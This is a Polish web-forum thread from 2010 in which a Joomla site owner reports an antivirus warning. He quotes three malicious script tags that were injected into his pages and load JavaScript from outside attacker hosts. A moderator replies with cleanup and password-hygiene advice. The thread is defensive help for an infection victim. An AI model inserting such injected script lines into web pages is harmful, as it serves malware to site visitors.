wiabek Opublikowano 8 Grudnia 2010 Zgłoś Udostępnij Opublikowano 8 Grudnia 2010 Witam. Po założeniu strony i jej funkcjonowaniu przez jakiś czas nie było problemów. Po mniej więcej pół roku pojawiły się ostrzeżenia z AVG i Avasta o infekcji (Site Exploit 1335). Sprawdziłem pliki w niektórych pojawiają się wpisy: <script type="text/javascript" src="http://sokyoss.drelshazly.com:8080/Wi-Fi.js"></script> <!--8024cdb752c416de2bdbf0c89f2233e4--> <script type="text/javascript" src="http://iopap.upperdarby26.com/Screenshot.js"></script> <!--8024cdb752c416de2bdbf0c89f2233e4--> <script type="text/javascript" src="http://aospfpgy.dogplaystation.com:8080/Page_View.js"></script> <!--8024cdb752c416de2bdbf0c89f2233e4--> Jak już wszystkie usunę wrzucę z powrotem stronę na serwer chciałbym się ustrzec kolejnej infekcji. Jak myślicie co i jak było nie tak z zabezpieczeniami, jak się ustrzec przed atakiem na przyszłość? Strona oparta o CMS Joomla, uprawnienia do katalogów ustawione na 755, do plików na 644. Dzięki za pomoc. Odnośnik do komentarza
picasso Opublikowano 8 Grudnia 2010 Zgłoś Udostępnij Opublikowano 8 Grudnia 2010 (edytowane) Brak dostatecznych informacji. M.in. nie ma tu danych o hostingu / serwerze (i np. czy to systemem współdzielony czy dedyk), wersjach oprogramowania, używanych klientach do komunikacji FTP. W każdym razie tu masz opis tego rodzaju infekcji: KLIK. Czyli sprawa się ogranicza do: - upewnić się, że to nie Twój system jest sprawcą i nie ma na nim malware wykradającego hasła (a do tego to należy spełnić zasady naszego działu = obowiązkowe logi z OTL + GMER) - wyczyścić stronę z wklejek - pozmieniać wszędzie hasła utylizowane do kontaktu ze stroną i nie korzystać z systemów zapamiętywania haseł w klientach FTP (jeśli klient nie pozwala ich szyfrować) - kontakt z dostawcą, bo może problem jest współdzielony i jest to kwestia hostingu Edytowane 10 Stycznia 2011 przez picasso 10.01.2011 - Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso Odnośnik do komentarza
Rekomendowane odpowiedzi